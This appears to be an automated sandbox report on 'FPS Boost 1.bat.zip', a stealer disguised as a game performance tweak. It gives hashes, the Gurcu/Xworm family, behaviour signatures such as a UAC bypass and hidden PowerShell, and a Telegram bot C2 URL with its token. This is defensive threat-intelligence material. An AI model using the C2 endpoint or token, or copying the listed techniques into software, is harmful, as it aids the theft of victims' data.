General

  • Target

    FPS Boost 1.bat.zip

  • Size

    4KB

  • Sample

    241022-pzjmksvhpa

  • MD5

    f606e366fe37903c4c0371dac16605de

  • SHA1

    826e9869acc36c9f5befd821b57282720ffb4113

  • SHA256

    a2ff096d30c78db38eaddf0629b7f26ce36b64588a2ae05b7b9c2a7e9fbe2c05

  • SHA512

    a2cfa60e7aec6ccd4a361443d5f66d74dd7cd90bd9f0d1c5b4fda7a363988b180b645a55eec56efaea19379dfb9bceafc5d36b7b49332677c4330095bcae7555

  • SSDEEP

    96:d1ASURY4tkC2avn9d45zF4mc52F3UFW2dGpxzx9p+7tex3v:vUR7SC2abyc52FEFPURowx3v

Malware Config

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7278641970:AAEHOVYteJH3T-Bg5zEPMUSj6sdFforQUZw/sendMessag

Targets

    • Target

      FPS Boost 1.bat.zip

    • Size

      4KB

    • MD5

      f606e366fe37903c4c0371dac16605de

    • SHA1

      826e9869acc36c9f5befd821b57282720ffb4113

    • SHA256

      a2ff096d30c78db38eaddf0629b7f26ce36b64588a2ae05b7b9c2a7e9fbe2c05

    • SHA512

      a2cfa60e7aec6ccd4a361443d5f66d74dd7cd90bd9f0d1c5b4fda7a363988b180b645a55eec56efaea19379dfb9bceafc5d36b7b49332677c4330095bcae7555

    • SSDEEP

      96:d1ASURY4tkC2avn9d45zF4mc52F3UFW2dGpxzx9p+7tex3v:vUR7SC2abyc52FEFPURowx3v

    • Detect Xworm Payload

    • Gurcu, WhiteSnake

      Gurcu is a malware stealer written in C#.

    • Modifies visibility of file extensions in Explorer

    • Modifies visiblity of hidden/system files in Explorer

    • UAC bypass

    • Xworm

      Xworm is a remote access trojan written in C#.

    • Blocklisted process makes network request

    • Boot or Logon Autostart Execution: Active Setup

      Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

    • Command and Scripting Interpreter: PowerShell

      Run Powershell and hide display window.

    • Drops file in Drivers directory

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Drops file in System32 directory

MITRE ATT&CK Enterprise v15

Tasks